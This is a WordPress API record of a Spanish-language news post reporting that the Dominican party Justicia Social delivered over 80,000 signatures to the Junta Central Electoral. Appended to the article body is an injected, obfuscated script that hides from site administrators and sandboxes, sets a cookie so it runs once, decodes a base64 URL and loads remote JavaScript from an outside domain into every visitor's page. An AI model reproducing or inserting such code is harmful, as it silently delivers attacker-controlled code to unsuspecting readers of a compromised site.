{"id":14209,"date":"2023-02-19T19:46:32","date_gmt":"2023-02-19T23:46:32","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14209"},"modified":"2023-02-19T19:46:32","modified_gmt":"2023-02-19T23:46:32","slug":"justicia-social-entrega-requisitos-ante-la-jce-para-su-reconocimiento-como-partido","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14209","title":{"rendered":"Justicia Social entrega requisitos ante la JCE para su reconocimiento como partido"},"content":{"rendered":"<p>C*SANTO DOMINGO*. &#8211; En una exitosa actividad que cont\u00f3 con la participaci\u00f3n de dirigentes pol\u00edticos, militantes y simpatizantes, Justicia Social (JS) entreg\u00f3 ante la Junta Central Electoral (JCE) las firmas y dem\u00e1s requerimientos necesarios para su aprobaci\u00f3n como partido pol\u00edtico.<\/p>\n<p>El acto estuvo encabezado por el abogado y pol\u00edtico dominicano Julio Cesar Valent\u00edn, l\u00edder de esta plataforma pol\u00edtica, quien expres\u00f3 su gratitud por la buena acogida que ha tenido la misma, la cual asume con m\u00e1s fuerza las banderas de la igualdad, la solidaridad y la transparencia.<\/p>\n<p>\u201cJusticia Social, surge para cumplir grandes cometidos, en el prop\u00f3sito de una Rep\u00fablica Dominicana m\u00e1s democr\u00e1tica, m\u00e1s igualitaria, m\u00e1s justa, m\u00e1s inclusiva, m\u00e1s comprometida con el medio ambiente y los recursos naturales, y m\u00e1s comprometidos con la igualdad de derechos entre mujeres y hombres\u201d, manifest\u00f3 el ex senador.<\/p>\n<p>Salud\u00f3 el esfuerzo realizado por los hombres y mujeres, que se movilizaron por todo el pa\u00eds, a los fines de cumplir con cada una de las exigencias de la ley electoral dentro del plazo establecido por la JCE.<\/p>\n<p>*Exitoso proceso de recolecci\u00f3n de firmas*<\/p>\n<p>Con la entrega de m\u00e1s de 80 mil firmas y otros requisitos de acuerdo a la ley 33-18, Justicia Social (JS) logra un importante objetivo, por el cual estuvo trabajando desde el pasado mes de diciembre a trav\u00e9s de numerosas jornadas de recolecci\u00f3n de r\u00fabricas en diferentes provincias del pa\u00eds.<\/p>\n<p>Hoy, ese apoyo se ve coronado con el cumplimiento de cada una de las exigencias de la normativa jur\u00eddica del sistema pol\u00edtico electoral dominicano, demostrando as\u00ed el avance y fortalecimiento de la naciente entidad pol\u00edtica.<\/p>\n<p>El pr\u00f3ximo paso ser\u00e1, de acuerdo a Julio C\u00e9sar Valent\u00edn es \u201cseguir organizando y consolidando esta organizaci\u00f3n\u201d.<\/p>\n<p>*Unidos por la inclusi\u00f3n y la justicia*<\/p>\n<p>Justicia Social (JS) naci\u00f3 de la mano del ex senador Julio C\u00e9sar Valent\u00edn, como una plataforma de lucha por la igualdad, la justicia, la transparencia, la inclusi\u00f3n y la participaci\u00f3n de los sectores excluidos de la din\u00e1mica del desarrollo nacional.<\/p>\n<p>Desde entonces, numerosos dirigentes y militantes de diversas organizaciones se han incorporado a sus filas, muchos de ellos tras renunciar a sus respectivos partidos pol\u00edticos al considerar que \u00e9stos dejaron atr\u00e1s sus ideales de pluralidad, honestidad, respeto y tolerancia.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>C*SANTO DOMINGO*. &#8211; En una exitosa actividad que cont\u00f3 con la participaci\u00f3n de dirigentes pol\u00edticos, militantes y simpatizantes, Justicia Social (JS) entreg\u00f3 ante la Junta Central Electoral (JCE) las firmas y dem\u00e1s requerimientos necesarios para su aprobaci\u00f3n como partido pol\u00edtico. El acto estuvo encabezado por el abogado y pol\u00edtico dominicano Julio Cesar Valent\u00edn, l\u00edder de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14211,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14209","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14209","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14209"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14209\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14209"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14209"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14209"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}